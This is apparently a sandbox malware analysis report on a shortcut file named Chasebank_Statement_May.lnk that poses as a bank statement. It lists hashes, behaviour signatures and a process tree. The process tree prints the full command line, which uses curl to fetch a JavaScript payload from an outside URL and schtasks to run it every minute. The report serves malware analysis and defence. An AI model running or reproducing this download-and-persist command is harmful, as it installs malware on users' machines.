Analysis
- max time kernel: 132s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20240508-en
- resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
- submitted: 06-06-2024 13:33
- Static task: static1
- Behavioral task: behavioral1
- Sample: Chasebank_Statement_May.lnk
- Resource: win7-20240508-en
- 5 signatures
- 150 seconds
General
- Target: Chasebank_Statement_May.lnk
- Size: 2KB
- MD5: 6bef4f06938cf2569a3ad26a9827269a
- SHA1: e9a2dbcf2bf6bead0f46c60b7b8b5ffcf0dcfc50
- SHA256: 22ce45aa4ec31f4937872fb15d6ae787168c0f5a8399f514dd69e4eecbdc075c
- SHA512: 989181fdb9e591f113d54e18c31f093f681b9b30b3651d06c81fd202a51735079b8fe90f5bc708428ec973eefcf83ea7b3e982786d7c19a19d1512965c739b9c
- Score: 3/10
Malware Config
Signatures
- Command and Scripting Interpreter: JavaScript (1 TTPs)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes: cmd.exe, cmd.exe, taskeng.exe
  description | pid | process | target process
  PID 1688 wrote to memory of 2916 | 1688 | cmd.exe | cmd.exe
  PID 1688 wrote to memory of 2916 | 1688 | cmd.exe | cmd.exe
  PID 1688 wrote to memory of 2916 | 1688 | cmd.exe | cmd.exe
  PID 2916 wrote to memory of 2352 | 2916 | cmd.exe | schtasks.exe
  PID 2916 wrote to memory of 2352 | 2916 | cmd.exe | schtasks.exe
  PID 2916 wrote to memory of 2352 | 2916 | cmd.exe | schtasks.exe
  PID 2716 wrote to memory of 3020 | 2716 | taskeng.exe | wscript.EXE
  PID 2716 wrote to memory of 3020 | 2716 | taskeng.exe | wscript.EXE
  PID 2716 wrote to memory of 3020 | 2716 | taskeng.exe | wscript.EXE
  PID 2716 wrote to memory of 1640 | 2716 | taskeng.exe | wscript.EXE
  PID 2716 wrote to memory of 1640 | 2716 | taskeng.exe | wscript.EXE
  PID 2716 wrote to memory of 1640 | 2716 | taskeng.exe | wscript.EXE
  PID 2716 wrote to memory of 632 | 2716 | taskeng.exe | wscript.EXE
  PID 2716 wrote to memory of 632 | 2716 | taskeng.exe | wscript.EXE
  PID 2716 wrote to memory of 632 | 2716 | taskeng.exe | wscript.EXE
- Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\Chasebank_Statement_May.lnk
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl -s -v -o HYgncxmQatsP.js "https://www.dsestimation.com/wp-content/uploads/2015/10/azoxyphenetole04.php" & schtasks /create /f /sc minute /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\HYgncxmQatsP.js' eTs6LGHd8vSKWwb" /tn eTs6LGHd8vSKWwb
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc minute /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\HYgncxmQatsP.js' eTs6LGHd8vSKWwb" /tn eTs6LGHd8vSKWwb
      - Creates scheduled task(s)
- C:\Windows\system32\taskeng.exe
  taskeng.exe {E12D3FBA-7C65-4EF6-9862-72EDC6EA5EE9} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\wscript.EXE
    C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\HYgncxmQatsP.js" eTs6LGHd8vSKWwb
  - C:\Windows\system32\wscript.EXE
    C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\HYgncxmQatsP.js" eTs6LGHd8vSKWwb
  - C:\Windows\system32\wscript.EXE
    C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\HYgncxmQatsP.js" eTs6LGHd8vSKWwb